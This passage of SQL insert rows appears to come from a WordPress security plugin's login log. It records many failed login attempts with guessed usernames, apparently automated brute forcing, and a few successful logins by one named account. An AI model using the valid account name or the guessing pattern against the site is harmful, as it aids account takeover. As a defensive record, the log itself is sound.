(8866, 31929, 1693352979.357231, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»Ìm', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8867, 31930, 1693352984.247534, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ f', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8868, 31931, 1693352990.559142, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ü~´', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8869, 31932, 1693352995.276012, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾N€^', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8870, 31933, 1693353000.443312, 1, 'loginFailInvalidUsername', 'password', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$GR¾', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8871, 31934, 1693353006.672203, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿqµ¹\0', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8872, 31935, 1693353011.603385, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿN\0š', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8873, 31936, 1693353026.677608, 1, 'loginFailInvalidUsername', 'password!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿº\raè', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8874, 31937, 1693353031.348130, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¥n•', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8875, 31938, 1693353034.230218, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼1©§', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8876, 31939, 1693353037.686043, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿrlìº', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8937, 32031, 1693618707.596616, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔüwT', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8938, 32032, 1693618711.884047, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿßéWË', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8939, 32033, 1693618718.154935, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶ÚÒ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8940, 32034, 1693618722.783421, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±¿ƒ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8941, 32035, 1693618727.065041, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿrq', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8942, 32036, 1693618748.666643, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¡W', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8943, 32037, 1693618751.953931, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn‰Âê', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8944, 32038, 1693618756.725809, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ=^êI', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8945, 32039, 1693618763.093970, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÉÜ®', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8946, 32040, 1693618768.132468, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ýK''', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8947, 32041, 1693618771.751024, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$K@¹', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9651, 41098, 1701074630.994376, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÇÃùÛ', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9650, 41093, 1701073099.596709, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~Ö', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),
(9652, 41099, 1701074643.347897, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ6n', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9653, 41102, 1701075560.047098, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ.c', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9654, 41106, 1701077064.567021, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½\\', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9655, 41111, 1701079047.714899, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½\\', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),
(9656, 41112, 1701079322.215058, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'),
(9657, 41113, 1701079377.840453, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½\\', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'),
(9658, 41114, 1701079543.855161, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½\\', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),
(9659, 41115, 1701080169.813380, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½S', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9660, 41118, 1701080758.523825, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹Š', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),
(9661, 41119, 1701081322.106675, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9662, 41120, 1701082803.016831, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½K', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9663, 41121, 1701082816.406873, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9664, 41122, 1701083310.418555, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ.c', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),
(9665, 41125, 1701084211.485087, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9666, 41125, 1701084211.502433, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9667, 41127, 1701086936.173644, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½K', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9668, 41131, 1701090041.325948, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9669, 41133, 1701091801.535412, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~Ö', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9670, 41137, 1701094186.386130, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1ª', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9671, 41139, 1701095697.505964, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)'),
(9672, 41140, 1701095909.390563, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~*', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),
(9673, 41140, 1701095909.403129, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~*', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),
(9674, 41142, 1701097878.803540, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½K', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9675, 41143, 1701098350.103628, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½S', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),
(9676, 41146, 1701101134.521532, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÍ¹~*', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(9677, 41151, 1701107932.570878, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔ$<', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9678, 41152, 1701107936.692061, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔ$U', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9679, 41153, 1701107940.931521, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÔ$R', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9603, 40704, 1700991950.224586, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ)E', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9607, 40709, 1700997681.861862, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1ª', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9604, 40706, 1700992644.748323, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½S', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(9605, 40707, 1700994506.397514, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9606, 40708, 1700995875.264297, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=º', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),
(9597, 39718, 1700864777.794748, 1, 'loginFailInvalidUsername', 'jeremiah', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿš&«ê', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(9598, 39765, 1700909684.510699, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼\\', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9599, 39770, 1700925494.257796, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9600, 39771, 1700925661.707178, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9601, 39773, 1700931698.869718, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9602, 39774, 1700931755.862680, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9608, 40711, 1700999195.962821, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9609, 40712, 1701000999.042743, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=º', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9610, 40713, 1701001660.376487, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½S', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),
(9611, 40714, 1701002340.392789, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9612, 40716, 1701004238.715983, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ.c', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9613, 40718, 1701005517.650861, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9614, 40719, 1701007479.095042, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹Š', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9582, 39367, 1700720990.692061, 1, 'loginFailInvalidUsername', 'wwwadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿpÕ[×', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9615, 40721, 1701010748.943098, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),
(9583, 39367, 1700720990.709008, 1, 'loginFailInvalidUsername', 'wwwadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿpÕ[×', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9584, 39368, 1700721041.214685, 1, 'loginFailInvalidUsername', 'wpuser', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸËGŸ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9585, 39369, 1700721139.498040, 1, 'loginFailInvalidUsername', 'admin6', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿmÍµÎ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9586, 39370, 1700721141.255252, 1, 'loginFailInvalidUsername', 'jisuo', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{î»', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9587, 39371, 1700721192.248335, 1, 'loginFailInvalidUsername', 'miruku', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿSbÉ"', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9588, 39372, 1700721220.147869, 1, 'loginFailInvalidUsername', 'wordpress_administratora', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ„”x', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9589, 39373, 1700721223.148817, 1, 'loginFailInvalidUsername', 'wordpress_administratora', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\rFÇù', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9590, 39374, 1700721259.053932, 1, 'loginFailInvalidUsername', 'xuanphong', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿB†Z', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9591, 39375, 1700721289.325245, 1, 'loginFailInvalidUsername', 'wpsystem', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿO¾ñz', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9592, 39376, 1700721291.732302, 1, 'loginFailInvalidUsername', 'user', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ2>°', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9593, 39377, 1700721295.559986, 1, 'loginFailInvalidUsername', 'user', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿºàD”', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9594, 39379, 1700721323.601573, 1, 'loginFailInvalidUsername', 'hxq1879', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆGí', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9595, 39380, 1700721324.395159, 1, 'loginFailInvalidUsername', 'hxq1879', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ[ˆ]', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9596, 39382, 1700722363.785797, 1, 'loginFailInvalidUsername', 'user', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿeœè', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),
(9616, 40722, 1701011476.648465, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb>Ú', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(9617, 40723, 1701012226.368727, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9618, 40724, 1701014175.808572, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½K', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9619, 40725, 1701014896.807736, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9620, 40726, 1701015598.001392, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½K', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9621, 40729, 1701017528.283606, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9622, 40730, 1701018227.600078, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1£', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9623, 40731, 1701018884.413369, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½2', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9624, 40733, 1701020906.219220, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9625, 40734, 1701021570.408610, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½:', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),
(9626, 40735, 1701022287.228538, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),
(9627, 40735, 1701022287.243496, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),
(9628, 40736, 1701024126.013883, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½•', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),
(9629, 40737, 1701027279.565882, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¼i', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0'),
